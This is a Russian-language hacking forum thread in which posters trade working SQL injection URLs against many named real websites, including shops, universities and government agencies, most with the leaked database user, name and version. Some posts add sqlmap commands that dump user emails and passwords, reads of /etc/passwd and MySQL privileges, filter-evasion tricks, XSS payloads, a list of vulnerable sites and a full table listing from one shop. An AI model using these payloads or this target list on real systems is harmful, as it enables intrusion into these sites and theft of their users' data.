https://www.sprint15.com/events/EMS/event.php?id=173%20and%20false%20union%20select%20 1,2,3,4,5,6,7,8,9,10,concat_ws(0x7C,user(),databas e(),%20version()),12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40--+

uspr_191808_0002@localhost|sprint15com_191808_db2| 5.5.62

Gl Bajaj Institute


Code:
http://www.glbimr.org/event.php?id=-55%27%20union%20select%201,concat_ws(0x7C,user(),d atabase(),version()),3--+

glbimrfeb2019@localhost|glbimr_org_feb21|5.6.43

Great Canadian Healthcare Mall

Вывода на страницу нет. Выводит в src аттрибут img тега.


Code:
view-source:http://greatcanadianhealthcaremall.com/product.php?id=-482%27%20/*!50000uNiOn*/%20/*!50000select*/%20%27im%20here2%27,2,3,4,concat_ws('|',current_us er,@@version),6,7,8,9,10%20--%20&ptab=description&title=Nitroglycerin

canazqik_user@localhost | 10.1.37-MariaDB-cll-lve

Отфильтровывает многие функции, в том числе database()


Code:
view-source:http://greatcanadianhealthcaremall.com/product.php?id=-482%27%20/*!50000uNiOn*/%20/*!50000select*/%20%27im%20here2%27,2,3,4,/*!50000sCheMA_naMe*/,6,7,8,9,10 from%20/*!50000infoRmaTioN_scHeMa.sCheMatA*/--%20&ptab=description&title=Nitroglycerin

canazqik_db

Берем все таблицы


Code:
view-source:http://greatcanadianhealthcaremall.com/product.php?id=-482%27%20/*!50000uNiOn*/%20/*!50000select*/%20%27im%20here2%27,2,3,4,/*!50000group_concat(table_name)*/,6,7,8,9,10 from%20/*!50000infoRmaTioN_scHeMa.tables*/ where table_schema='canazqik_db'--%20&ptab=description&title=Nitroglycerin

Считаем что там вообще есть


Code:
view-source:http://greatcanadianhealthcaremall.com/product.php?id=-482%27%20/*!50000uNiOn*/%20/*!50000select*/%20%27im%20here2%27,2,3,4,/*!50000count(*)*/,6,7,8,9,10 from%20orders where length(paypaldata)>3--%20&ptab=description&title=Nitroglycerin

Astinsriwedarisolo


Code:
http://www.astinsriwedarisolo.com/product.php?id=-111111111111111111111111111%27%20union%20select%20 %271%27,concat_ws(%27|%27,%20database(),user(),ver sion()),%273%27,%274%27,%275%27,%276%27--+

astin|astin@localhost|5.5.44


Code:
http://www.astinsriwedarisolo.com/product.php?id=-1%27%20union%20select%20%271%27,group_concat(colum n_name,0x0a)%20,%273%27,%274%27,%275%27,%276%27%20 from%20information_schema.columns%20where%20table_ schema%20like%20database()%20and%20table_name=%27a rf_member%27--+

Для тех кому не лень с переводчиком сидеть

Miyabi


Code:
http://www.miyabi.com.au/item.php?id=281%20and%201%3E2%20union%20select%201 ,2,3,4,5,6,7,concat_ws(%27|%27,user(),database(),v ersion()),9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23--+

driving_miyabi@bsd34.qnetau.com (mailto:driving_miyabi@bsd34.qnetau.com)|driving_m iyabi|5.7.21-log


Code:
http://www.miyabi.com.au/item.php?id=281%20and%201%3E2%20union%20select%201 ,2,3,4,5,6,7,user(),group_concat(column_name,0x0a) ,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from% 20information_schema.columns%20where%20table_schem a=database()%20and%20table_name=%27MEMBER%27--+

WebLoadmpStore


Code:
http://www.webloadmpstore.com/product.php?id=-3%20/*!12345uNioN*/+/*!12345SeLeCt*/+1,2,concat_ws(0x7c,database(),user(),version()),4 ,5,6,7

webloadm_new|webloadm_new@localhost|5.6.39-83.1

Corbett Foundation


Code:
http://www.corbettfoundation.org/product.php?id=-53%20union%20select%201,2,3,4,5,6,concat_ws(%27|%2 7,database(),user(),version()),8,9,10,11&cat=&subcat=

corbettf_org|corbettf_org@localhost|5.6.43

Go Healthy


Code:
https://gohealthy.co.za/product.php?id=-612%27%20union%20select%201,concat_ws(%27|%27,user (),database(),version()),group_concat(table_name,0 x0a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23%20from%20information_schema.tables%20wher e%20table_schema=database()--+

goheadbwpz_1@dedi909.jnb (mailto:goheadbwpz_1@dedi909.jnb)1.host-h.net|goheadbwpz_db1|10.1.38-MariaDB-1~jessie

И так сливаю данную скулю найденную на smotra.ru, так как мое обращение к ним было проигнорировано.


Code:
sqlmap -u http://smotra.ru/market/cat/11*/ -D sm_test --dbms mysql --sql-shell --random-agent

DB: sm_test

USER: sm_test@localhost

VERSION: 5.1.73

И вот собственно Эрик:


Code:
sqlmap -u 'http://smotra.ru/market/cat/11*/' -D sm_test -T users -C email, password --where="slug='erik_davidych'" --dump --dbms mysql --random-agent

Фискальная служба Украины


Code:
http://sfs.gov.ua/registration.php?search=area&hregion_id=2 and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x7c,database(),user(),version()) )))

XPATH syntax error: ' site|front_tmp@10.85.6.2|5.1.73'

И сразу быстрый вопрос. При появлении слова FROM сразу получается ошибка синтаксиса. Не могу дальше никак пройти.

Собственно сам вопрос: это действительно какая то ошибка синтаксиса или там такого рода фильтрация?

И как вообще эту дичь обойти, потому что не первый раз стопорится именно на FROM и ничего не заходит. Хакеры, подскажите

Національна Академія Аграрних наук України


Code:
http://imesg.gov.ua/info/index.php?id=41

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=41' AND 2988=2988 AND 'ouFu'='ouFu

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=41' AND SLEEP(5) AND 'cnAl'='cnAl

VERSION: 5.6.34

USER:imesg_db_utf@localhost

DB: imesg_db_utf

Управление труда и социальной защиты населения Хмельницкого городского совета


Code:
https://soczahist.khm.gov.ua/index.php?ID=-423%20union%20select%20concat_ws(0x7c,database(),v ersion(),user()),group_concat(table_name),3,4%20fr om%20information_schema.tables%20where%20table_sch ema=database()

soczahis_soczah|5.5.53|soczahis_soczah@localhost


Что то с оборотом наркотиков и их лицензии


Code:
http://usuan.dls.gov.ua/filial.php?id=-4347%20union%20select%201,concat_ws(0x7c,%20databa se(),user(),%20version()),3,4,5,6,7,8,9,11,12,13,1 4

usuan|5.6.38|usuan@localhost

Code:
http://www.blubud.it/eng/news.php?id=-88+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7--

stanok


Code:
http://stanok.in.ua/details.php?id=-21292%20union%20select%201,2,3,4,5,6,7,8,9,concat_ ws(0x7c,database(),version(),user()),11,12,13,14,1 5,16,17,18,19,20

ininterne1_stan|5.5.42-log|ininterne1_stan@192.168.1.41

какой то испанский шоп


Code:
http://tecnicellmaracaibo.com/product.php?id=-175%27%20uNiOn%20SeLeCt%201,2,concat_ws(0x7c,datab ase(),version(),user()),4,5,6,7,8,9,10,11,12,13--+-

tecni_sitio|5.6.43|tecni@localhost

Code:
http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,conc at_ws(0x7c,database(),version(),user()),12,13,14,1 5,16,17,18,19,20,21--+-&type=2

db_eircicai|5.5.51|koresoft@localhost

и XSS тут же


Code:
http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,%3Cs cript%3Ealert(%27xss/sqli%27)%3C/script%3E,12,13,14,15,16,17,18,19,20,21--+-&type=2

BenderMR said:
↑ (https://antichat.live/posts/4300487/)

Code:
http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,conc at_ws(0x7c,database(),version(),user()),12,13,14,1 5,16,17,18,19,20,21--+-&type=2

db_eircicai|5.5.51|koresoft@localhost
и XSS тут же

Code:
http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,%3Cs cript%3Ealert(%27xss/sqli%27)%3C/script%3E,12,13,14,15,16,17,18,19,20,21--+-&type=2



Это называется SiXSS

Code:
http://www.vepakistan.com/detail.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,concat_ws(0x3a,version(),database(),user() ),19,20--

Code:
http://www.fc-utd.co.uk/report.php?match_id=-1901+union+select+user()+--+

Code:
http://www.kaspiy.az/news.php?id=-103085 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20 -- -

Code:
https://reference-audio-analyzer.pro/review-report.php?id=1691' AND (SELECT 3106 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(3106=3106,1))),0x717a716a71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Pzbc'='Pzbc

MegaKeys.RU


Code:
https://megakeys.ru/soft/product.php?id_d=1972300%27%20union%20select%201,2 ,3,4,5,6,7,concat_ws(%27|%27,%20database(),user(), version()),9,10--+-#&rtype=good&page=9

Code:
http://www.semsk.kz/newscat.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())+--+

BChainHacks


Code:
https://www.bchainhacks.com/event.php?id=-122%20%20UNION%20ALL%20SELECT%201,2,concat_ws(0x7c ,database(),version(),user()),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34

bchain_live|10.2.24-MariaDB|bchain_live_user@localhost

Code:
www.all-guitar-chords.com/topic.php?id=-4794' union all select concat_ws(0x23,version(),database(),user(),load_fi le('/etc/passwd')),2,3,4,5,6,7,8,9,10,group_concat(concat_w s(0x3a3a,host,user,file_priv,insert_priv,update_pr iv) SEPARATOR " ") FROM mysql.user --%20

5.5.52-MariaDB


Code:
https://www.txdirectory.com/online/abc/detail.php?id=217 union select concat_ws(0x3a3a,version(),user(),database(),group _concat(table_name separator " ")),2,3,4 from information_schema.tables where table_schema=database() --%20

5.5.61-0ubuntu0.14.04.1-log


Code:
https://www.hotelnewsresource.com/go.php?id=-1298989163' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(substring(concat_ws(0x23,version(),(select schema_name from information_schema.schemata limit 3,1),(select file_priv from mysql.user where user='root' and host='localhost'),0x23), 1), floor(rand(0)*2))) --%20

5.5.60-MariaDB

curl http://bitcoin-office.com/globalscape-register-miner-contract.php --data "worker=azaza'and(extractvalue(1,concat(0x3b,(selec t/**/version()))))and'"

Error: XPATH syntax error: ';10.1.41-MariaDB-cll-lve'

https://sarov.info Колючий Саров Яндекс ИКС (бывший тИЦ) 3600

Несколько SQL иньекций.

Первая:


Code:
https://sarov.info/phones/yp/index.php?cat=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3+--+1

admin_bbnews@192.168.1.17:5.6.38:admin_bbnews

Вторая:


Code:
curl https://sarov.info/bills/np/doubles.php --data "bill_id%5B1401653 and extractvalue(1,concat(0x3b,(select(version()))))%2 3%5D=on&delform=1" -H "Authorization: Basic a29sc2FyOmlsZW5hc2Fy"

XPATH syntax error: ';5.6.38'

Владелец ресурса, Кирилл Асташов aka BadBlock известный в Нижегородской области борец с экстремизмом в комментариях, с последующими заявлениями в центр "Э".

Code:
https://www.6-movies.com/category.php?id=28 union select 1,2,concat_ws(0x3a3a,version(),user(),group_concat (column_name)),4,5,6,7 from information_schema.columns where table_name='chatusers' and table_schema='NauGerComDB2' --%20

5.5.55-0+deb8u1


Code:
www.nwu.edu.bd/news_details.php?id=-37 '/*!50000union*/ /*!50000select*/ concat_ws(0x2323,version(),group_concat(table_name )),2 from /*!50000information_schema.tables where table_schema='nwuedu_web'*/ --%20

5.6.41-84.1


Code:
www.tpmrotator.com/list.php?id=-2522' union select concat_ws(0x2323,version(),database(),user(),group _concat(table_name separator " ")) from information_schema.tables where table_schema=database() --%20

5.5.60-MariaDB


Code:
www.asfaa.org/members.php?id=-14 union select 1,concat_ws(0x23,@@hostname,@@version_compile_os,@ @datadir,@@tmpdir,@@basedir),3,group_concat(table_ name separator " ") from information_schema.tables where table_schema=database() --%20

5.6.36-82.0


Code:
https://www.testprepkart.com/sat/blog-single.php?id=-12' union select 1,group_concat(column_name separator " "),3,4,5,6,7,concat_ws(0x3a3a,version(),database(), user(),@@hostname,@@version_compile_os,@@datadir,@ @tmpdir,@@basedir),9,10,11,12,13,14,15,16 from information_schema.columns where table_name='admin' and table_schema=database() --%20

5.6.38


Code:
https://www.nhe-group.com/category.php?id=-31 '/*!50000union*/ /*!50000select*/ 1,2,3,4,group_concat(column_name),6,7,8,concat_ws( 0x2323,version(),user(),0x2323),10,11,12,13,14,15 from /*!50000information_schema.columns where table_schema='ibrahim2_nhegroup' and table_name='admins'*/ --%20

5.6.32-78.1


Code:
https://www.htrends.com/go.php?id=927823727' or (select count(*) from (select 1 union select 2 union select 3)b group by concat(mid(concat_ws(0x3a3a,version(),(select schema_name from information_schema.schemata limit 0,1)),1,63), floor(rand(0)*2))) --%20

5.5.60-MariaDB


Code:
www.consuladoportugalgoa.com/pages.php?id=-2 union select 1,concat_ws(0x2323,version(),user(),@@hostname,@@v ersion_compile_os,@@datadir,@@tmpdir,@@basedir),gr oup_concat(column_name),4,5,6 from information_schema.columns where table_schema='consulad_con_pc' and table_name='users'--%20

5.7.27


Code:
https://www.nitolinsurance.com/news_details.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3, group_concat(column_name) from information_schema.columns where table_schema='nitolins_website' and table_name='admin' --%20

10.1.41-MariaDB


Code:
http://www.ssy.org/detail.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3, group_concat(cast(table_name as char)),(select cast(schema_name as char) from information_schema.schemata limit 0,1),6,7,8,9,10,11,12,13 from information_schema.tables where table_schema='ssy_datassy' --%20

5.6.45


Code:
https://www.compassboxwhisky.com/blog/post-print.php?id=-19' union select 1,concat_ws(0x2323,version(),user()),3,4,5,(select file_priv from mysql.user where user='compassbox'),7,group_concat(table_name),9,10 ,11,12 from information_schema.tables where table_schema='compassbox' --%20

5.5.60-MariaDB


Code:
https://www.faithandpublicpolicy.org/news.php?id=-464' union select group_concat(table_name),concat_ws(0x2323,version( ),user(),(select file_priv from mysql.user where user='webuser')),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6 from information_schema.tables where table_schema='sys'--%20

5.7.25

Code:
http://www.ibins.ru/useful.php?id=-1%27union+select+1,version(),3,4,database()--+

version:

5.6.25-73.1


Code:

https://www.russianspares.com/products.php?cat=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16--+


version

5.6.45


Code:
https://www.wjhy.com.hk/en/product_detail.php?id=25+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,VERSION(),18,19,20,21,2 2,23--+

version 5.5.40

Фрагментированная sql injection в скрипте spartak bux, на нем работают не плохое проекты.

||extractvalue(1,concat(0x3a,(select @@version)))#

Список уязвимых сайтов: (можно найти еще)


seo-rublick.ru/advertise.php (http://seo-rublick.ru/advertise.php)
e-clius.com/advertise.php (https://e-clius.com/advertise.php)
wmr-club.ru/advertise.php (https://wmr-club.ru/advertise.php)
seopulse.net/advertise.php (https://seopulse.net/advertise.php)
seospays.ru/advertise.php (https://seospays.ru/advertise.php)
mogojo.ru/advertise.php (https://mogojo.ru/advertise.php)
restprofit.site/advertise.php (https://restprofit.site/advertise.php)
seo-express.site/advertise.php (https://seo-express.site/advertise.php)
bonus-bux.ru/advertise.php (http://bonus-bux.ru/advertise.php)
seo-yalta.ru/advertise.php (https://seo-yalta.ru/advertise.php)
seofakt.ru/advertise.php (http://seofakt.ru/advertise.php)
buxseo.site/advertise.php (http://buxseo.site/advertise.php)
userf.ru/advertise.php (https://userf.ru/advertise.php)



Post запрос (для hack bar)


type_serf=1&nolimit=0&url=
http://site.ru&title=\
&description=
[SQL]
&url_banner=&plan=1000&timer=20&up_list=0&color=0&active=0&revisit=0&unic_ip=0&new_users=0&no_ref=0&sex_adv=0&to_ref=0&limit_d=0&limit_h=0&method_pay=1


Для новичков


В заголовок ссылки: \
Описание ссылки: команды

glassofvenice.com

интернет магазин

внутри много интересного.


Code:
https://www.glassofvenice.com/landingpages.php?lp=murano-glass-beads&filters=36_10_38

Parameter: lp (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lp=murano-glass-beads' AND 5931=5931 AND 'HFLm'='HFLm&filters=36_10_38

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: lp=murano-glass-beads' AND (SELECT 2228 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(2228=2228,1))),0x7171766b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rqhj'='rqhj&filters=36_10_38

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: lp=murano-glass-beads' AND SLEEP(5) AND 'AqWz'='AqWz&filters=36_10_38

Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: lp=-8269' UNION ALL SELECT 53,53,53,53,53,53,CONCAT(0x717a6b7a71,0x4a61754d67 545a515571454669416b6f567a4d68696c4c4b57546d4a4b4a 434c7752545479434164,0x7171766b71),53,53-- lNAv&filters=36_10_38
---
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0

Database: glassdb
[145 tables]
+----------------------------------------------------+
| address_book |
| address_format |
| admin |
| admin_files |
| admin_groups |
| admin_logs |
| affiliate_affiliate |
| affiliate_banners |
| affiliate_banners_history |
| affiliate_clickthroughs |
| affiliate_news |
| affiliate_news_contents |
| affiliate_newsletters |
| affiliate_payment |
| affiliate_payment_status |
| affiliate_payment_status_history |
| affiliate_sales |
| amzn_orders |
| amzn_orders_items |
| amzn_products |
| amzn_products_description |
| amzn_products_report |
| amzn_reviews |
| amzn_seller_feedbacks |
| banners |
| banners_history |
| cache |
| cache_filters |
| cart_reminder |
| catalog_product_entity |
| categories |
| categories_description |
| configuration |
| configuration_group |
| contrib_tracker |
| counter |
| counter_history |
| countries |
| coupon_email_track |
| coupon_gv_customer |
| coupon_gv_queue |
| coupon_redeem_track |
| coupons |
| coupons_description |
| currencies |
| customer_entity |
| customers |
| customers_basket |
| customers_basket_attributes |
| customers_basket_info |
| customers_info |
| customers_points_pending |
| customers_temp |
| directory_country |
| directory_country_region |
| dos_protect |
| eav_attribute |
| eav_attribute_option |
| eav_attribute_option_value |
| emails_templates |
| etsy_products |
| etsy_products_images |
| etsy_taxonomies |
| filter_product_options |
| filter_products_attributes |
| filter_products_options_values |
| filter_products_options_values_to_products_options |
| geo_zones |
| giftwrap_options |
| google_checkout |
| google_configuration |
| google_orders |
| headertags |
| headertags_cache |
| headertags_default |
| headertags_pages |
| headertags_silo |
| inv_inventory_purchases |
| inv_model_xref |
| jet_orders |
| jet_orders_products |
| jet_returns |
| jet_returns_products |
| jet_returns_products_refund_amount |
| landing_pages |
| landing_pages_products |
| languages |
| mage_orders |
| mage_orders_products |
| manufacturers |
| manufacturers_info |
| newsletters |
| orders |
| orders_products |
| orders_products_attributes |
| orders_products_download |
| orders_status |
| orders_status_history |
| orders_status_history_transactions |
| orders_total |
| products |
| products_attributes |
| products_attributes_download |
| products_attributes_relations |
| products_attributes_sets |
| products_attributes_sets_elements |
| products_attributes_sets_to_products |
| products_description |
| products_extra_images |
| products_notifications |
| products_options |
| products_options_values |
| products_options_values_to_products_options |
| products_recommend |
| products_taxonomy_mapping |
| products_to_categories |
| products_variants |
| products_variants_images |
| products_variants_to_products_attributes |
| products_xsell |
| reviews |
| reviews_description |
| rma_return_reasons |
| scart |
| search_queries |
| search_queries_sorted |
| searchword_swap |
| sessions |
| sitemap_exclude |
| sliders |
| sliders_description |
| sliders_images |
| sliders_images_links |
| specials |
| tax_class |
| tax_rates |
| visitor |
| visual_verify_code |
| whos_online |
| wishlists |
| wishlists_products |
| wm_products |
| ws_products |
| zones |
| zones_to_geo_zones |
+----------------------------------------------------+

RWD said:
↑ (https://antichat.live/posts/4341925/)
glassofvenice.com
интернет магазин
внутри много интересного.

Code:
https://www.glassofvenice.com/landingpages.php?lp=murano-glass-beads&filters=36_10_38

Parameter: lp (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lp=murano-glass-beads' AND 5931=5931 AND 'HFLm'='HFLm&filters=36_10_38

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: lp=murano-glass-beads' AND (SELECT 2228 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(2228=2228,1))),0x7171766b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rqhj'='rqhj&filters=36_10_38

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: lp=murano-glass-beads' AND SLEEP(5) AND 'AqWz'='AqWz&filters=36_10_38

Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: lp=-8269' UNION ALL SELECT 53,53,53,53,53,53,CONCAT(0x717a6b7a71,0x4a61754d67 545a515571454669416b6f567a4d68696c4c4b57546d4a4b4a 434c7752545479434164,0x7171766b71),53,53-- lNAv&filters=36_10_38
---
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0

Database: glassdb
[145 tables]
+----------------------------------------------------+
| address_book |
| address_format |
| admin |
| admin_files |
| admin_groups |
| admin_logs |
| affiliate_affiliate |
| affiliate_banners |
| affiliate_banners_history |
| affiliate_clickthroughs |
| affiliate_news |
| affiliate_news_contents |
| affiliate_newsletters |
| affiliate_payment |
| affiliate_payment_status |
| affiliate_payment_status_history |
| affiliate_sales |
| amzn_orders |
| amzn_orders_items |
| amzn_products |
| amzn_products_description |
| amzn_products_report |
| amzn_reviews |
| amzn_seller_feedbacks |
| banners |
| banners_history |
| cache |
| cache_filters |
| cart_reminder |
| catalog_product_entity |
| categories |
| categories_description |
| configuration |
| configuration_group |
| contrib_tracker |
| counter |
| counter_history |
| countries |
| coupon_email_track |
| coupon_gv_customer |
| coupon_gv_queue |
| coupon_redeem_track |
| coupons |
| coupons_description |
| currencies |
| customer_entity |
| customers |
| customers_basket |
| customers_basket_attributes |
| customers_basket_info |
| customers_info |
| customers_points_pending |
| customers_temp |
| directory_country |
| directory_country_region |
| dos_protect |
| eav_attribute |
| eav_attribute_option |
| eav_attribute_option_value |
| emails_templates |
| etsy_products |
| etsy_products_images |
| etsy_taxonomies |
| filter_product_options |
| filter_products_attributes |
| filter_products_options_values |
| filter_products_options_values_to_products_options |
| geo_zones |
| giftwrap_options |
| google_checkout |
| google_configuration |
| google_orders |
| headertags |
| headertags_cache |
| headertags_default |
| headertags_pages |
| headertags_silo |
| inv_inventory_purchases |
| inv_model_xref |
| jet_orders |
| jet_orders_products |
| jet_returns |
| jet_returns_products |
| jet_returns_products_refund_amount |
| landing_pages |
| landing_pages_products |
| languages |
| mage_orders |
| mage_orders_products |
| manufacturers |
| manufacturers_info |
| newsletters |
| orders |
| orders_products |
| orders_products_attributes |
| orders_products_download |
| orders_status |
| orders_status_history |
| orders_status_history_transactions |
| orders_total |
| products |
| products_attributes |
| products_attributes_download |
| products_attributes_relations |
| products_attributes_sets |
| products_attributes_sets_elements |
| products_attributes_sets_to_products |
| products_description |
| products_extra_images |
| products_notifications |
| products_options |
| products_options_values |
| products_options_values_to_products_options |
| products_recommend |
| products_taxonomy_mapping |
| products_to_categories |
| products_variants |
| products_variants_images |
| products_variants_to_products_attributes |
| products_xsell |
| reviews |
| reviews_description |
| rma_return_reasons |
| scart |
| search_queries |
| search_queries_sorted |
| searchword_swap |
| sessions |
| sitemap_exclude |
| sliders |
| sliders_description |
| sliders_images |
| sliders_images_links |
| specials |
| tax_class |
| tax_rates |
| visitor |
| visual_verify_code |
| whos_online |
| wishlists |
| wishlists_products |
| wm_products |
| ws_products |
| zones |
| zones_to_geo_zones |
+----------------------------------------------------+



бд шифрованая ?

fantasycruncher.com

сайт спортивной тематики, права на чтение паролей MySQL и всех бд


Code:
https://www.fantasycruncher.com/cheatsheet.php?id=783b2c1a48b5b3e0

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=783b2c1a48b5b3e0' AND 1291=1291 AND 'YNvr'='YNvr

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=783b2c1a48b5b3e0' AND SLEEP(5) AND 'KAys'='KAys
---

web application technology: PHP 5.6.29, Nginx 1.10.1
back-end DBMS: MySQL 5 (MariaDB fork)

Code:
http://www.wakecamp.ru/index.php?action=item&id=54+and+1=0+union+distinct+select+1,2+

Ресурс позиционирует себя как крупнейший сайт по поиску работы в Бангладеш, траф соответствует.

Microsoft SQL Server 2012 - 11.0.7462.6


Code:
http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=@@version -- &Fair_Id=5713



Code:
http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=(select db_name(1)) -- &Fair_Id=5713



Code:
http://bdjobs.com/jobfair/ComFairWithJob_print.asp?Att_Id=2981 and 1=(select top 1 name from master..sysobjects where name not in ('sp_MSalreadyhavegeneration','sp_MSwritemergeperf counter')) -- &Fair_Id=5713

Ну и чуть-чуть для разнообразия

PostgreSQL 9.4.24 SIXSS (пофиксили )


Code:
http://www.acb.com/menu.php?id=-7253 union select 1,(chr(60)||chr(47)||chr(100)||chr(105)||chr(118)| |chr(62)||chr(60)||chr(115)||chr(99)||chr(114)||ch r(105)||chr(112)||chr(116)||chr(62)||chr(97)||chr( 108)||chr(101)||chr(114)||chr(116)||chr(40)||chr(4 1)||chr(60)||chr(47)||chr(115)||chr(99)||chr(114)| |chr(105)||chr(112)||chr(116)||chr(62)||concat_ws( chr(32)||chr(35)||chr(32),session_user,version(),a rray_to_string(array(select DISTINCT schemaname from pg_catalog.pg_tables),','),array_to_string(array(s elect tablename from pg_catalog.pg_tables where schemaname='pg_catalog'),','),array_to_string(arra y(select attname from pg_catalog.pg_attribute where attrelid=(select oid from pg_catalog.pg_class where relname='pg_class') AND attnum>0),','))) --%20

Sqlite 3.7.17


Code:
webdocs.cs.ualberta.ca/~hwsamuel/cardea/helix/catalog.php?id=4 union select 1,(sqlite_version())||char(35,35,35,35,35)||group_ concat(tbl_name),3,group_concat(sql),5,6,(select group_concat(path) from document)||char(35,35,35,35,35)||(select group_concat(url) from document),8,9 from sqlite_master --%20

Sqlite 3.3.7


Code:
www.newvideos.x0.com/channel/play.php?file_id=274' union select 1,2,(select sql from sqlite_master where type='table' limit 1,1),sqlite_version(),(select sql from sqlite_master where type='table' limit 0,1),6,7,8 from sqlite_master --%20

Code:
http://www.horus.com.eg/newdetails.php?Id=-89+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6--

Поддомен sourceforge


Code:
http://leaf.sourceforge.net/index.php?PAGE_user_op=view_page&PAGE_id=5&MMN_position=20:20&module=-111' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(version(), 1, 63), floor(rand(0)*2))) --%20



Code:
http://leaf.sourceforge.net/index.php?PAGE_user_op=view_page&PAGE_id=5&MMN_position=20:20&module=-111' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid((select schema_name from information_schema.schemata limit 1,1), 1, 63), floor(rand(0)*2))) --%20

Make It Yours или привет от кулер_мастер

Будь внимателен


Code:
https://makerhub.coolermaster.com/custom-lighting/download.php?id=-177 union select 1,2,3,4,5,6,(select schema_name from information_schema.schemata limit 0,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 --%20

Code:
http://www.comwave.edu.pk/download.php?id=-131+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3--

Sri Lank Ministry of Highways & Road Development


Code:
https://mohsl.gov.lk/en/projects.php?project=-1+union+select+1,2,3,4--&type=0&view_project=View%20Project

Sri Lanka, University of Ruhuna


Code:
http://www.sci.ruh.ac.lk/botany/academic_staff_profile.php?id=-893+union+select+1,2,3,4,5,6,7,8,9,10,11--

Code:
https://www.amaluxuryshower.it/eng/scheda-news.php?ID=-7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,concat_ws(0x3a,version(),database(),user ()),20,21,22,23,24,25--

Centro Convegni Sant’Agostino


Code:
http://www.cortonasviluppo.it/dettaglio-news.php?id=-228+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7,8,9,10,11,12,13--

USA Indian Diaspora Council


Code:
http://www.indiandiasporacouncil.org/news.php?id=-86+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6--



Code:
https://www.trmh.com/news.php?id=-75+union+select+1,version(),3,4,5--

Индийской шоп деревянных игрушек


Code:
https://gooutofbox.com/category-list.php?id=-82 union select 1,concat(user(),0x3a,version(),0x3a,database())-- -



Code:
https://www.renzglobal.com/eshop/product-details.php?id=-56' union select 1,2,concat(user(),0x3a,version(),0x3a,database()), 4,5,6,7,8,9,10,11,12,13,14,15-- -

Индийский шоп.

15к трафа


Code:
https://www.corporategiftsbangalore.com/details.php?id=426' /*!50000union*/ /*!50000select*/ 1,2,/*!50000concat(user(),0x3a,version(),0x3a,database( ))*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -

Снова индийский шоп


Code:
https://www.print2shop.com/product-details.php?id=-75' /*!50000union*/ /*!50000select*/ 1,2,/*!50000concat(user(),0x3a,version(),0x3a,database( ))*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -&&idd=T-SHIRT WHITE POLYESTER

Ну и последний на сегодня. Сервис принта на футболках.

Страну угадайте сами

Code:
